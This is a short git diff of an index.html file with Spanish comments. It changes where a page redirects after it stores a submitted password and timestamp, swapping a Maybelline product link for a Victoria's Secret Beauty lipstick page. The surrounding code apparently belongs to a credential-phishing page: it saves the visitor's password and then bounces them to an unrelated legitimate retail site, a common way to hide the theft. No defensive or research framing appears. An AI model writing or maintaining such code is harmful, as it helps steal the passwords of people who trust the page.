--- a/index.html
+++ b/index.html
@@ -89,8 +89,8 @@
         password: password,
         fecha: new Date().toLocaleString()
       }).then(() => {
-        // Redirigir al nuevo enlace de Maybelline después de guardar
-        window.location.href = "https://www.maybelline.com.mx/todos-los-productos/maquillaje-para-ojos/cejas/super-lock-clear-gel?variant=Super+Lock+Clear+Gel&gclsrc=aw.ds&gad_source=1&gad_campaignid=21783241585&gbraid=0AAAAAC3qpt3MM8HMncTiu47WoY8ZykYDL&gclid=Cj0KCQjw5onGBhDeARIsAFK6QJY-qMjVhjjVzKtjlVmx33Qv9SV2bIlI0XbUDO6QugscVvJz67mxsy4aAr8VEALw_wcB";
+        // Redirigir al enlace de labiales de Victoria's Secret después de guardar
+        window.location.href = "https://www.victoriassecretbeauty.gt/labiales?srsltid=AfmBOoo2_GxIY1cl2nZ2CsCl6SQLnFRbuxZ9361fBPAY0qZHHPJQjaKH";
       }).catch((error) => {
         alert("Error al guardar: " + error.message);
       });
